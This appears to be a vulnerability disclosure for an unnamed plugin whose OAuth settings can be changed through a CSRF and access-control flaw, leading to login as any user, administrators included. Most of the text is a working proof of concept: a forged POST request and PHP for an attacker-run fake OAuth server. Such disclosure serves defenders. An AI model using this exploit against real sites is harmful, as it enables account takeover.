The plugin is affected by a Broken Access Control, Cross-Site Request Forgery (CSRF) vulnerability that can be used to modify the OAuth server endpoints, which leads to an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrative role on the client’s website.
Proof of Concept
POST / HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=oauthconfig&OAuthConfig_nonce=-&oauthservers=Custom_OAuth&client_id=-&client_secret=-&rquest_in_body=1&client_authorization=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fauth%3D1&client_token_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Ftoken%3D1&client_userinfo_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fresource%3D1
With exploit.php
controlled by the attacker with:
/** auth endpoint */
if ( isset( $_GET['auth'] ) ) {
if ( isset( $_GET['response_type'] ) ) {
if ( 'code' == $_GET['response_type'] ) {
header( 'Location: ' . $_GET['redirect_uri'] . '/?' . http_build_query( array(
'code' => '-', //can be anything, just don’t be empty
) ) );
exit;
}
}
}
/** token endpoint */
if ( isset( $_GET['token'] ) ) {
if ( isset( $_POST['grant_type'] ) ) {
echo json_encode( array(
'access_token' => '-', //can be anything, just don’t be empty
) );
exit;
}
}
/** resource endpoint */
if ( isset( $_GET['resource'] ) ) {
echo json_encode( array(
'email' => '[email protected]',
'user_login' => '-', //can be anything, just don’t be empty
) );
exit;
}